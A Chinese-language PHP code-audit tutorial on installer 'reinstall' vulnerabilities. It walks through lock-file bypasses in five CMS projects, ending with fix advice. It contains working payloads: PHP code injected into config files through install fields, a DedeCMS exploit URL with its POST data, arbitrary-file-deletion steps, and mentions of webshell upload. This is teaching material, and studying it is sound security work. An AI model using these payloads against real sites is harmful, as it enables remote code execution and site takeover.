PHP 代码审计系列（一）重装漏洞

 

前言

系统学习审计也有很长一段时间了，打算把期间复现的漏洞和各种知识做一些梳理，算是一个审计系列，希望能帮助到初学者入门。

这次说的重装漏洞在早年有很多，原因大多数是判断是否安装的部分写得不严谨，而到了现在以结合其他漏洞存在导致 RCE 的占多数，因为任意删除文件导致的是最常见的。

总之，如有不当，烦请评论捉虫，我会在第一时间响应并评论提示错误，谢谢。

 

重装漏洞的种类

1.自动删除这个安装文件

通过生成一个 lock 文件来判断程序是否安装过。

2.根本无验证

安装完成后不会自动删除文件，又不会生成 lock 判断是否安装过。

3.安装file

直接用 GET 提交 step 绕过，直接进入下一步。

如果安装过程中存在多个页面，而且在第一个页面存在判断是否安装，可以通过直接访问后面的页面进行重装。

说白了就是安装步骤中所有页面并非都经过了 lock 文件的验证，可以直接访问。

4.变量覆盖导致重装

可以 GET，POST，COOKIE 任意提交一个变量名 insLockfile ，给其赋空值，覆盖掉​ insLockfile ，从而让 file_exists 为 false 就不会退出。

5.判断 lock 后，无exit

判断是否存在 lock 文件，如果存在 lock 文件，就会 header 到 index.php ，但是 header 后并没有 exit ，所以并不会退出，类似的还有 javascript 弹个框。

6.解析漏洞

在安装完成后会将 install.php 重命名为 index.php.bak ，但是由于 Apache 的解析漏洞：如果无法识别到最后一个后缀的话，就会向上解析，那么就又变成了 php 了，然后结合安装时的变量覆盖又成重装了。

7.满足一些条件不会退出的

上述都是某牛课程里的总结，但我觉得太散了不够泛，我个人觉得精简成下面这样更好理解，每个附加了几个案例方便实践，有的在下面漏洞复现会提到：

1.没有 lock 文件验证

2.有 lock 文件验证

(1) 没有 exit 只用了 header 重定向 / 满足一些条件没有结束进程（比如虽然有 exit 但并不影响其他页面）。

这种可以通过安装过程中填写信息闭合写入配置文件利用。

(2) 安装步骤的所有页面并非都进行了 lock 文件验证，也就是验证缺陷。

这种可以直接跳步骤来利用。

CVE-2019-16314 indexhibit cms v2.1.5 重装漏洞就是这个原因。

(3) 组合拳导致重装，也就是上面两种都有，且严格，但可以通过其他漏洞删除 lock 文件 / 修改（如果是判断 lock 文件内容 / 某个 lock 相关变量）重装。

DedeCMS v5.7 的重装漏洞就是属于判断 lock 相关的一个变量，可以通过变量覆盖加解析漏洞组合来重装。

而 iWebShop v5.9.21010 则是通过任意删除文件从而删除了 lock 文件来重装。

 

漏洞复现

以下复现了五个漏洞，由浅入深，由易到难，都是我认为比较具有代表性的，作为一个集锦以供大家参考。

前三个仅作为学习参考，现在比较少见了，后两个是现在普遍有所存在的，利用的好就是高危。

源码戳我下载

VAuditDemo 重装漏洞

漏洞成因：有 lock 文件验证但无 exit

对应上述种类的第五种，漏洞代码如下：

这里虽然进行了 lock 文件的验证，但在重定向到 index.php 之后并没有结束进程，所以可以在安装页面抓包修改数据作为该 if 语句之后的代码执行，从而导致了重装漏洞。

我们来看安装页面提交的数据部分：

if ( $_POST ) {

    ...

    $dbhost = $_POST["dbhost"];
    $dbuser = $_POST["dbuser"];
    $dbpass = $_POST["dbpass"];
    $dbname = $_POST["dbname"];

    ...

    // exp;-- -";phpinfo();//

    mysql_query( "CREATE DATABASE $dbname", $con ) or die ( mysql_error() );

    $str_tmp="<?php\r\n";
    $str_end="?>";
    $str_tmp.="\r\n";
    $str_tmp.="error_reporting(0);\r\n";
    $str_tmp.="\r\n";
    $str_tmp.="if (!file_exists(\$_SERVER[\"DOCUMENT_ROOT\"].'/sys/install.lock')){\r\n\theader(\"Location: /install/install.php\");\r\nexit;\r\n}\r\n";
    $str_tmp.="\r\n";
    $str_tmp.="include_once('../sys/lib.php');\r\n";
    $str_tmp.="\r\n";
    $str_tmp.="\$host=\"$dbhost\"; \r\n";
    $str_tmp.="\$username=\"$dbuser\"; \r\n";
    $str_tmp.="\$password=\"$dbpass\"; \r\n";
    $str_tmp.="\$database=\"$dbname\"; \r\n";
    $str_tmp.="\r\n";
    $str_tmp.="\$conn = mysql_connect(\$host,\$username,\$password);\r\n";
    $str_tmp.="mysql_query('set names utf8',\$conn);\r\n";
    $str_tmp.="mysql_select_db(\$database, \$conn) or die(mysql_error());\r\n";
    $str_tmp.="if (!\$conn)\r\n";
    $str_tmp.="{\r\n";
    $str_tmp.="\tdie('Could not connect: ' . mysql_error());\r\n";
    $str_tmp.="\texit;\r\n";
    $str_tmp.="}\r\n";
    $str_tmp.="\r\n";
    $str_tmp.="session_start();\r\n";
    $str_tmp.="\r\n";
    $str_tmp.=$str_end;

    $fp=fopen( "../sys/config.php", "w" );
    fwrite( $fp, $str_tmp );
    fclose( $fp );

    ...

可以看到 $dbxx 四个参数都没有经过任何过滤就作为 php 文件的一部分拼接到了一起，并且写入了 /sys/config.php 文件当中。

本质上这个文件还是在对是否安装以及数据库连接进行检验。

<?php
    error_reporting(0);
    if (!file_exists($_SERVER["DOCUMENT_ROOT"].'/sys/install.lock')){
        theader("Location: /install/install.php");
        exit;
    }
    include_once('../sys/lib.php');
    $host=$dbhost;
    $username=$dbuser;
    $password=$dbpass;
    $database=$dbname;
    $conn = mysql_connect($host,$username,$password);
    mysql_query('set names utf8',$conn);
    mysql_select_db($database, $conn) or die(mysql_error());
    if (!$conn){
        die('Could not connect: ' . mysql_error());
        exit;
    }
    session_start();
>

$dbname 是我们可控且能修改的，对应 payload：

;-- -";phpinfo();//

ps:-- - 是为了注释 sql 语句后面的部分，后面的 - 只是为了突出-- 后的空格，并不必要。

拼接到一起即：

而安装后的 index.php 会包含这个 config.php 文件：

所以可以直接在主页看到 phpinfo 界面，当然也可以拼接一句话木马 getshell 。

利用过程：

payload：

访问主页：

zswin v2.6 博客重装漏洞

漏洞成因：可直接进入安装页面验证缺陷 + 无 exit

漏洞在于 Install/Install/Controller/IndexController.class.php 中：

zswin 是 tp 框架，我们可以看到 index 方法对于 lock 文件的验证并没有在控制器的初始化方法中，也就是说即使没有通过验证，也不影响安装，且安装页面没有对 lock 文件的验证，安装后也可访问，就可进行重装。

接下来我们来看执行安装的数据部分：

public function finish_done() {

        ...

        $this->_show_process('注册创始人帐号');

        //注册创始人帐号
        //修改配置文件
        $auth  = build_auth_key();
        // 这些数据都没有进行过滤检查
        $config_data['DB_TYPE'] = $temp_info['db_type'];
        $config_data['DB_HOST'] = $temp_info['db_host'];
        $config_data['DB_NAME'] = $temp_info['db_name'];
        $config_data['DB_USER'] = $temp_info['db_user'];
        $config_data['DB_PWD'] = $temp_info['db_pass'];
        $config_data['DB_PORT'] = $temp_info['db_port'];
        $config_data['DB_PREFIX'] = $temp_info['db_prefix'];
        $db = Db::getInstance($config_data);
        $config_data['WEB_MD5'] = $auth;
        // write_config 本质就是把 sqldata 下的信息写入配置文件
        $conf     =    write_config($config_data);
        // Install/Install/Common/function.php
        // function write_config($config, $auth){
        //    if(is_array($config)){
        //        //读取配置内容
        //        $conf = file_get_contents(MODULE_PATH . 'sqldata/conf.tpl');
        //        $user = file_get_contents(MODULE_PATH . 'sqldata/user.tpl');
        //        //替换配置项
        //        foreach ($config as $name => $value) {
        //            $conf = str_replace("[{$name}]", $value, $conf);
        //            $user = str_replace("[{$name}]", $value, $user);
        //        }
        //        //写入应用配置文件
        //        file_put_contents('./App/Common/Conf/config.php', $conf);
        //        file_put_contents('./App/User/Conf/config.php', $user);
        //        return '';
        //    }
        //}
        register_administrator($db, $temp_info['db_prefix'], $temp_info, $auth);

         $this->_show_process('注册创始人帐号成功');
         //锁定安装程序
        touch('./Data/install.lock');

        ...

来看 sqldata 下的配置内容：

user.tpl

<?php

/**
 * UCenter客户端配置文件
 * 注意：该配置文件请使用常量方式定义
 */

define('UC_APP_ID', 1); //应用ID
define('UC_API_TYPE', 'Model'); //可选值 Model / Service
define('UC_AUTH_KEY', '[WEB_MD5]'); //加密KEY
define('UC_DB_DSN', '[DB_TYPE]://[DB_USER]:[DB_PWD]@[DB_HOST]:[DB_PORT]/[DB_NAME]'); // 数据库连接，使用Model方式调用API必须配置此项
define('UC_TABLE_PREFIX', '[DB_PREFIX]'); // 数据表前缀，使用Model方式调用API必须配置此项

由上我们可以利用 DB_PREFIX 闭合（在最后一条方便处理）拼入 config.php 文件，其实和 VAuditDemo 的思路差不多。

zs_');phpinfo();//

// 拼接的效果：
define('UC_TABLE_PREFIX', 'zs_');
phpinfo();
//); // 数据表前缀，使用Model方式调用API必须配置此项

利用过程：

访问 /App/User/Conf/config.php 文件：

DedeCMS v5.7 重装漏洞

漏洞成因：利用 Apache 解析漏洞 + 变量覆盖

这个漏洞利用条件必须存在 Apache 的解析漏洞，而 DedeCMS 在安装后会把安装文件 /install/index.php 备份成 /install/index.php.bak ，存在解析漏洞时可以作为 .php 文件执行。

关于 Apache 的解析漏洞我觉得还是有必要有点说明：

参考 Apache解析漏洞详解 – milantgh – 博客园 (cnblogs.com)

并非网上所说的“低版本的 Apache 存在未知扩展名解析漏洞”。

应该是使用 module 模式与 php 结合的所有版本 Apache 存在未知扩展名解析漏洞，使用 fastcgi 模式与 php 结合的所有版本 Apache 不存在此漏洞。并且，想利用此漏洞必须保证文件扩展名中至少带有一个 .php ，否则将默认被作为 txt/html 文档处理。

另外，这也就要求利用前 install 文件夹本身没有被删除。

我们先执行安装一次，可见 /install 目录下已经有了 index.php 的备份 .bak 文件以及 lock 文件：

直接访问安装页面会提示已经安装：

接下来我们来看 index.php.bak 文件，对其进行分析：

<?php

...

$insLockfile = dirname(__FILE__).'/install_lock.txt';

...

// （1）这段的意思是，遍历数组（即通过 HTTP GET/POST/Cookies 方式传递的变量的数组）将其读取到的参数赋给 $_request，再遍历将其以键值对的形式赋值给 $_k、$_v，${$_k} 的值是 $_v 进行 RunMagicQuotes 过滤后的值。
// （3）但这里存在变量覆盖漏洞，原因是 $$_request 是引用变量，且用了 foreach 进行键值对赋值，假设我们自己传入 $insLockfile 为 snovving（随意字符串），那么 $_k 则为 insLockfile ，而 $_v 则为 snovving，${$_k}（引用 $_k 的值作为变量名） 即为 $insLockfile ，那么赋值后即 $insLockfile 的值为 snovving ，但 snovving 文件是不存在的，所以我们可以绕过验证进行重装。
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
// RunMagicQuotes 这个过滤函数主要是为了防注入，对于一般字符串并没有什么作用
// install/install.inc.php 
//function RunMagicQuotes(&$str)
//{
//    if(!get_magic_quotes_gpc()) {
//        if( is_array($str) )
//            foreach($str as $key => $val) $str[$key] = RunMagicQuotes($val);
//        else
//            $str = addslashes($str);
//    }
//    return $str;
//}

require_once(DEDEINC.'/common.func.php');

// （2）这判断 $insLockfile 这个变量值（即 lock 文件“正确”的绝对路径）是否存在 lock 文件，如果不存在则可重装。
if(file_exists($insLockfile))
{
    exit(" 程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！");
}

if(empty($step))
{
    $step = 1;
}

...

由上代码注释中的 3 点分析，我们可以这样构造 payload（参照法师前辈的）：

http://www.localhost.com/install/index.php.bak?insLockfile=snovving&step=4

POST
step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&adminuser=admin&adminpwd=admin&cookieencode=JzIVw7439H&webname=%CE%D2%B5%C4%CD%F8%D5%BE&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Flocalhost&cmspath=%2Fdedecms

step 4 对应 step 3 填写完数据后的安装过程，这样即可重装成功。

因为漏洞太过古早，phpstudy 早已没有相对应 Apache 的版本可供实现，所以仅在理论上梳理了一遍此漏洞，接下来对比 Dedecms 补丁后的 SP1 是如何修复此漏洞的：

如图使用了 define 定义为常量，也就无法通过传参来利用变量覆盖了。

最后学习一下 DedeCMS 5.7通用重装漏洞 + PoC分析 – BT’s blog (bt7k.com) 的技巧优化点，列在这方便查阅：

1. $insLockfile 值最好用随机数，防止 /install 目录下恰巧有这个文件。
2. 漏洞点是 index.php、index.php.bak文件，可以用字典试一下（ Apache 的解析漏洞实在很少了）。
3. 判断响应包时建议找全版本通用的固定出现的字符串，并选出多个 verify_key ，逐个判断，杜绝误报。
4. user-agent 最好伪造。

这种类型还在 XDCMS v1.0 中出现过。

iWebShop v5.9.21010 重装漏洞导致 RCE

参考 iWebShop开源商城系统V5.9.21010存在命令执行漏洞_Y4tacker的博客-CSDN博客 ，复现学习一下，师傅本人写的已经很清楚了，在这仅进行一些补充，我觉得这是个很好的例子，这涉及到了利用其他漏洞删除 lock 文件来重装。

其实重装漏洞只要删除 install 文件基本没那么多事了。

首先进行前置工作，我们先登录后台，在 会员->商户管理->添加商户 处添加一个商户。

然后再在首页的商家管理处登录。

随便添加一个商品。

添加之后回到后台，对这三个表进行备份，并下载备份文件：

对备份文件进行如下修改：

很简单可以看到 iwebshop_goods 和 iwebshop_goods_photo 是通过一个中间表 iwebshop_goods_photo_relation 连接起来的，iwebshop_goods 的 id 从 iwebshop_goods_photo_relation 查找到 iwebshop_goods_photo 表对应的图片 id 。

这里的 2 对应的就是商品图片的 id ，无论修改为什么数字只要对应上就好，原来是图片的 md5 值，这里为了方便演示改为了 2 ，并且把商品图片的路径从 uploads/xxx.jpg 改为 lock 文件的目录即可。

这时候 /install 目录下的 lock 文件还在。

修改后再在后台进行本地导入，成功后回到商家管理界面删除我们刚才添加的商品。

删除后再看 lock 文件已经作为该商品的“图片”一并删除了：

这样我们再次访问安装页面即可重装，接下来也是常规的找能写入配置文件的数据闭合达到 RCE 的目的。

payload：

hacktest','snovving'=>phpinfo()))))?>

安装完成后访问前台：

接下来我们来看代码层面是什么样的。

首先看导致任意文件删除部分，对应后台上传备份文件的地方，找到相应控制器部分：

controllers/tools.php

classes/dbbackup.php 中 parseSQL 对备份文件进行解析时，根据截取的前 2 字符判断SQL类型：

而我们之前下载的备份文件是以 DROP TABLE IF EXISTS iwebshop_goods; 开头，进入默认分支：

可以看到只对进入分支的每行数据添加了 ; 来分句，并无其他过滤。

而上传完备份文件后，我们来看商家管理删除商品的部分。

controllers/seller.php

跟进 del ：

classes/goods_class.php

对删除的文件也没有任何限制就直接 unlink 删除了。

关于寻找配置信息构造闭合的部分，可以从 install/index.php 入手。

install/include/function.php

跟踪 create_config ：

可以看到没有任何过滤。

构造部分，可以参照与 config.php 默认的模板文件：

db_name 是最后的参数，且是我们可控的，我们可以利用这个传入 phpinfo 并闭合前面 array 并添加 php 文件结尾避免后面的 ') 等字符干扰，就得到 payload ：

hacktest','snovving'=>phpinfo()))))?>

因为后台修改商品导致任意文件删除导致重装还有 WFPHP 也曾经存在这个问题。

行云海 CMS 重装漏洞

tp 框架，先安装一遍。

一般任意文件删除可以用 Seay 或者全局搜索 unlink 发现，审计整个项目的时候可以从一些公共类文件入手（比如放在什么 /inc 文件目录下的或名称有 .class 的），更别说是数据库相关的方法了，这次的漏洞就在于：

App/Manage/Controller/DatabaseController.class.php

也是对删除文件没有限制就删除了。

路径：

登录后台，找到了数据库管理模块（这里其实对 tp 框架路由有了解的直接访问 s=/Database/方法 即可 ）

随便给几个表备份一下，这里我们利用 POST 传递 lock 文件的路径（关于这个个人习惯是 POST 最好利用，因为 GET 有 URL 编码限制，请求提交的数据还有长度限制，很多时候比不上 POST 方便安全，当然这里也可以通过 GET 发送 payload，一般 GET 只读，而 POST 写），我们在批量删除的时候抓包复制下 url 。

根据目录改成 lock 文件相对的路径再发包即可。

前台删除导致重装的可以参考一下天目 MVC Home 版 T2.13 的重装漏洞。

 

修复建议&一些思考

1.正确处理 lock 文件
2.判断安装完成后要退出
3.在安装的每一步都要进行验证
4.所有输入点都要进行过滤，特别涉及到数据库的操作
5.最后的最后，就是删除 /install 文件，多看看安装后的温馨提示

另外实际渗透中，涉及一些重要数据还是不要利用重装漏洞，毕竟最珍贵的还是数据。